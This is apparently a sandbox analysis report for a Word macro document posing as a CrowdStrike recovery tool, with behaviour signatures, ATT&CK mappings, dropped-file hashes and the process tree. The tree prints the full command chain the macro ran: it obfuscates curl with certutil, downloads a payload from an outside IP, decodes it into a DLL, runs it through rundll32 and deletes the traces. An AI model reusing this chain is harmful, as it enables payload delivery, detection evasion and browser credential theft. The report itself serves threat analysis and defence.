803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61

Analysis

max time kernel
141s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
22-07-2024 13:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Size

302KB
MD5

dd2100dfa067caae416b885637adc4ef
SHA1

499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256

803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
SHA512

809a6c7a3d83cc9b025a3109778be1d92db509d12202a30ecb31b8c8fbaeae2a50732e36d41b065b10ab64d04990e46173e09e01799bb54f8a93e725e111deda
SSDEEP

6144:LkNC0FaiQjxrRbX1o/EUk1DPFVpigBHbP4Z4IU1vmR8:LkNCcC6cf1xVpJNP0QNs8

Score

10^/10

spyware stealer

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4016	1080	cmd.exe	85

Blocklisted process makes network request 37 IoCs

Processes:

rundll32.exe

flow	pid	Process
33	2404	rundll32.exe
34	2404	rundll32.exe
35	2404	rundll32.exe
39	2404	rundll32.exe
87	2404	rundll32.exe
89	2404	rundll32.exe
90	2404	rundll32.exe
91	2404	rundll32.exe
92	2404	rundll32.exe
93	2404	rundll32.exe
94	2404	rundll32.exe
95	2404	rundll32.exe
96	2404	rundll32.exe
97	2404	rundll32.exe
98	2404	rundll32.exe
99	2404	rundll32.exe
104	2404	rundll32.exe
105	2404	rundll32.exe
112	2404	rundll32.exe
113	2404	rundll32.exe
114	2404	rundll32.exe
115	2404	rundll32.exe
116	2404	rundll32.exe
117	2404	rundll32.exe
118	2404	rundll32.exe
119	2404	rundll32.exe
121	2404	rundll32.exe
122	2404	rundll32.exe
123	2404	rundll32.exe
124	2404	rundll32.exe
125	2404	rundll32.exe
131	2404	rundll32.exe
140	2404	rundll32.exe
141	2404	rundll32.exe
142	2404	rundll32.exe
143	2404	rundll32.exe
144	2404	rundll32.exe

Executes dropped EXE 1 IoCs

Processes:

curl.exe

pid	Process
5108	curl.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid	Process
2404	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
3036	taskkill.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid	Process
1080	WINWORD.EXE
1080	WINWORD.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

taskkill.exe

description	pid	Process
Token: SeDebugPrivilege	3036	taskkill.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXE

pid	Process
1080	WINWORD.EXE
1080	WINWORD.EXE
1080	WINWORD.EXE
1080	WINWORD.EXE
1080	WINWORD.EXE
1080	WINWORD.EXE
1080	WINWORD.EXE
1080	WINWORD.EXE

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WINWORD.EXEcmd.exerundll32.execmd.exe

description	pid	Process	procid_target
PID 1080 wrote to memory of 4016	1080	WINWORD.EXE	88
PID 1080 wrote to memory of 4016	1080	WINWORD.EXE	88
PID 4016 wrote to memory of 4540	4016	cmd.exe	90
PID 4016 wrote to memory of 4540	4016	cmd.exe	90
PID 4016 wrote to memory of 2336	4016	cmd.exe	91
PID 4016 wrote to memory of 2336	4016	cmd.exe	91
PID 4016 wrote to memory of 2924	4016	cmd.exe	92
PID 4016 wrote to memory of 2924	4016	cmd.exe	92
PID 4016 wrote to memory of 5108	4016	cmd.exe	94
PID 4016 wrote to memory of 5108	4016	cmd.exe	94
PID 4016 wrote to memory of 1280	4016	cmd.exe	99
PID 4016 wrote to memory of 1280	4016	cmd.exe	99
PID 4016 wrote to memory of 2404	4016	cmd.exe	100
PID 4016 wrote to memory of 2404	4016	cmd.exe	100
PID 2404 wrote to memory of 4980	2404	rundll32.exe	101
PID 2404 wrote to memory of 4980	2404	rundll32.exe	101
PID 4980 wrote to memory of 3036	4980	cmd.exe	103
PID 4980 wrote to memory of 3036	4980	cmd.exe	103

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\Admin\AppData\Local\Temp & certutil -f -encode C:\Users\Admin\AppData\Local\Temp\curl.exe C:\Users\Admin\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\Admin\AppData\Local\Temp\curl.txt C:\Users\Admin\AppData\Local\Temp\curl.exe & C:\Users\Admin\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll & del C:\Users\Admin\AppData\Local\Temp\curl.exe & del C:\Users\Admin\AppData\Local\Temp\curl.txt & del C:\Users\Admin\AppData\Local\Temp\curl.exe & del C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\system32\xcopy.exe
    xcopy C:\Windows\System32\curl.exe C:\Users\Admin\AppData\Local\Temp
    3⤵
    PID:4540
- - C:\Windows\system32\certutil.exe
    certutil -f -encode C:\Users\Admin\AppData\Local\Temp\curl.exe C:\Users\Admin\AppData\Local\Temp\curl.txt
    3⤵
    PID:2336
- - C:\Windows\system32\certutil.exe
    certutil -f -decode C:\Users\Admin\AppData\Local\Temp\curl.txt C:\Users\Admin\AppData\Local\Temp\curl.exe
    3⤵
    PID:2924
- - C:\Users\Admin\AppData\Local\Temp\curl.exe
    C:\Users\Admin\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt
    3⤵
    - Executes dropped EXE
    PID:5108
- - C:\Windows\system32\certutil.exe
    certutil -f -decode C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll
    3⤵
    PID:1280
- - C:\Windows\system32\rundll32.exe
    rundll32 C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll,DllMain
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4980
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD4A28.tmp\sist02.xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Local\Temp\curl.exe

Filesize
411KB

MD5
1c3645ebddbe2da6a32a5f9fb43a3c23

SHA1
086f74a35d5afed78ae50cf5586fafffb7845464

SHA256
0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205

SHA512
ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

Download Submit
C:\Users\Admin\AppData\Local\Temp\curl.txt

Filesize
565KB

MD5
84eecbc73cd5eaee274ce94170e1aab1

SHA1
1f58106f5aae78e20c9bea8514c985060a4c4635

SHA256
758f1d9168ad2d2f053e046b63a47b8912efc56b68cff809ef60e6595defad7d

SHA512
d49b1a494081ec4dbb173fd4df300a91e631420728d49dc87f7621776403425452cb0dd592610ab221203b4dc4c3ef4e4973f7043f9c796836495cfc25072b0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\mscorsvc.dll

Filesize
1.3MB

MD5
eb29329de4937b34f218665da57bcef4

SHA1
1ba68f4e998ee1e405dac983084e7ef5b2d08664

SHA256
4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a

SHA512
27a252dd4e698217524568365eb951e94036e21cd4f4fce51e84d0cc041622d0b5160b0af30b3d030d2f580529f1c65c49a673659d5298d4e6dc0fee1e6ff60a

Download Submit
C:\Users\Admin\AppData\Local\Temp\mscorsvc.txt

Filesize
1.9MB

MD5
d67ea3b362d4e9b633216e85ac643d1f

SHA1
53d1c13de6e049a5b41fd3b6e5876060f73d28eb

SHA256
5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721

SHA512
e252cc98bd44b392af9e7b85a3fdb26385c9f678f4959dc59726f991083f44b489043e7f3db55a1cfce14f9cf78abebc77fff26f101132ecf71348051ea255e7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
f6b3d40ae06b0f889f74a30134995ae3

SHA1
1c6dd881f966df49f2b1fce400207fa8a74b4a23

SHA256
cde18fe51f69aa9782f1aa93bb1b0e0087a0bc647b1a7a0cc6b76708f17258e3

SHA512
a92fec685dac5175f105ba8336f8bccb6029f34d9ac4c3d62435a1802956bca8aa49f1cb51fe0c90821bfda9d0133c6680b73403a4145ae0d076ba79164e18cc

Download Submit
C:\Windows\Temp\Q29tcGxldGVJbnN0YWxsLnR4dA==

Filesize
340KB

MD5
d0edabf359652a07f5367594a02f04f0

SHA1
c763ddf72a918bbd1ae48f799ebf785ad76fc6c2

SHA256
c90c8e2b699cd8a0cba18f1d2bd1b78747761439d643c50de6a3315db0ca1b44

SHA512
374ad4f1c639182a206ed505dd1b16d232fd5c3d27affb24956d152a160ca8eed21d2b7ae4463ff48cf08a1071c47ac06fc650f2bf2aa9d5fc3e998b3948b85e

Download Submit
C:\Windows\Temp\Q2xlYXJMb2NrLnBwdHg=

Filesize
220KB

MD5
df16fd516ca0f71082295a644960a3a8

SHA1
67371f32ae87aed85f8f866a2946923959ccc37e

SHA256
e9157189cbe47e32585890bb802df439a546c212d422d67a484b6b6e7e06287e

SHA512
d672e2511b7e4cd1161fb643ac05e3d8681fe1bff9f7fca963a7ba524e1ab36ad3866d3b4fdbd2907307d380e1936a0c778d4444ad3a9e6771c3e4d4db20df6a

Download Submit
C:\Windows\Temp\QXBwcm92ZVdhaXQudHh0

Filesize
287KB

MD5
93286790910af2613233930156316095

SHA1
4a07ee277267fa9b0a24cf0ec92d048ecde928ca

SHA256
7935de5dfcbfbc488a4fa80c0c3e5294cd842dac7dd33cdf061e9a69f68701e1

SHA512
5f9d355aa4024436c2c1959646a12367a0574fd4d98dcd688942b588038b5c56e0f3bafadb4cebab80411c89c4d57283c6d4b08f8abc6f34ad5cf4a73fab7ccc

Download Submit
C:\Windows\Temp\RXhwb3J0U3RhcnQudHh0

Filesize
395KB

MD5
42d02ab9ea68491d335abb8c0218579a

SHA1
7da419ea1f83dc66e30df885dbfd5359c9de1171

SHA256
b7eaecde73bfdca23fdca5b4917fc422d7381dac58b02db0bb44053d10f3eb48

SHA512
ee5d23f5b96f8f4893a9b885e1de31b3752ca4b7f79bbef5f9fffbbef24736dcc7aee83a657204fbfc0844ccefceb8e5a1365c9cfdd853f2ba8bddb010fa309c

Download Submit
C:\Windows\Temp\Rm9ybWF0R2V0LmRvY3g=

Filesize
16KB

MD5
e66dac8531263cfab5442937a2b9af4c

SHA1
5bb392a0685a0d1ac6595871568aadf8038ea9cf

SHA256
327ea04a58e158ce0d4e394458c1a26e3f51255a5fca6b61769cacee084e481c

SHA512
fecce62449c50917a7cfb4afb5b4b10bd618a864accd49719604c2da96421217d2d0d1d3f0e7974febe894ba05f6cd60fb9edad43c20698edc3c76ba991422c9

Download Submit
C:\Windows\Temp\Rm9ybWF0SW5pdGlhbGl6ZS5kb2N4

Filesize
207KB

MD5
57f8b9b0a46ec7f0c17b0f0cff8adad6

SHA1
73b5ea4aabe42503fbfd4e44c533caa46976b5e0

SHA256
8d88fa7de2cbe192f2015d7991e68f631aee86a14ef361adefd999934593fe3f

SHA512
4f26208c4a7aeb73f70cb5bf7258be19df23bf1dce11d413217bc248c81206afcbe576b9ba6b25100a1a24eb59988a582b4b3a79274e178aa3ef1626d30b4a69

Download Submit
C:\Windows\Temp\Sm9pbkNoZWNrcG9pbnQucHB0

Filesize
763KB

MD5
573418f0674829c5f2ba18fc539013f3

SHA1
3f3d1c24423f966c2db4327d9b243a58b13d302e

SHA256
c45679629e0e01883975bd16d6eab7b0c344f79f0f208fc8bb0539e159b28ab1

SHA512
e27716e176eda03a9dce43b25d203872c89b3af98c81e8f7ca7d32a0d600061c80faa07091129b0b45b8bf497d487a9e903eefff2d4746421a78269f087dc104

Download Submit
C:\Windows\Temp\T3V0VW5sb2NrLnhsc3g=

Filesize
12KB

MD5
f4cc1d881c670aea2de71054c4068ab0

SHA1
dd5f0775cfe8cdded9b497ff4f5ef4c193eb689d

SHA256
c912abb4166b34a590188392157084032f70a6e9b191d3f138af244becd55677

SHA512
e42890ca18fc5d48f7a376b659bbc73a617e4166487ca725615f97b9c49ea1498675025d91a70a3bec6f6cef86b18434006d17dcf298c6e4525fc41138477b1f

Download Submit
C:\Windows\Temp\U2F2ZVNlYXJjaC5kb2N4

Filesize
17KB

MD5
f29cb8c850e3e6c8c4f0f2b991be9062

SHA1
d0b9b050be105f1500bfc93d3e343be2fe8427f4

SHA256
4e73d9a4f0e8c9637db672535cfa66b28342b9382642356aea85af47971abe07

SHA512
e2b746c0c5c30e812c5ee0a195cc08aef75c619811eaa90a2074ce9cd36c6fe21f6600c5e666305b91847c947672eeb8771e6d3c29ed2a315b9da316a5c975f5

Download Submit
C:\Windows\Temp\U2V0U2VsZWN0Lnhscw==

Filesize
462KB

MD5
300acce90c71383783e24d5cde3864bb

SHA1
851318ebd29f7ba5bb16073bfbb6e33c8828ad2d

SHA256
0f46091e0addd4bf6bd70892b7be1d28e2ee8b3573d74855d9e5a843ae2f3d69

SHA512
5c0b21c72be755c42a7c2cbb4943a1629510a36da90bd3267780ad50b8b5d9bdc11063746f23a75e51f8814ed1e63669e98d04ced206ff7c11c7254af3583b44

Download Submit
C:\Windows\Temp\UHVibGlzaE1lcmdlLnBwdA==

Filesize
488KB

MD5
7f391a81051d32fa61df034945eb47f8

SHA1
176523eb05423b7c9b8708edfa73cfa6f4fa5d46

SHA256
dd29f505b37b3b9e90d7104cfab849cf6072cfe69ec62ce4113b17638190c2f2

SHA512
5356aebdbd10e1bd457c7a34e9f0673461613645ab3bf0cee2f77139123034fe409a7c329fded6366fed5206f0b562a9c4fc83f849d63bde10b42664be3f3489

Download Submit
C:\Windows\Temp\VW5wdWJsaXNoRXhpdC54bHN4

Filesize
11KB

MD5
21c29b7c2452cafedd7daf97b107bf60

SHA1
9dacf5b2607480568311da5cc463d95192f8fa6f

SHA256
a7b59b2c0b4e1cf747568d23411d8a62b27033345fa7a259bd868a17ea3de182

SHA512
f86ec154ee62558d1a389fdb651d5d32ff2b205b4b3e8fa743bcf30dcd0b587f6be0373cb41a120f58db98c016416d5e461d1af21e6d96d6a2907cb7405058e7

Download Submit
memory/1080-53-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-4-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-7-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-54-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-9-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-10-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-11-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-13-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-12-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-8-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-6-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-5-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-312-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-313-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-314-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-52-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-3-0x00007FF8F69CD000-0x00007FF8F69CE000-memory.dmp

Filesize
4KB

Download
memory/1080-0-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-2-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-1-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-14-0x00007FF8B4950000-0x00007FF8B4960000-memory.dmp

Filesize
64KB

Download
memory/1080-17-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-18-0x00007FF8B4950000-0x00007FF8B4960000-memory.dmp

Filesize
64KB

Download
memory/1080-20-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-19-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-15-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-16-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download
memory/1080-457-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-456-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-459-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-458-0x00007FF8B69B0000-0x00007FF8B69C0000-memory.dmp

Filesize
64KB

Download
memory/1080-460-0x00007FF8F6930000-0x00007FF8F6B25000-memory.dmp

Filesize
2.0MB

Download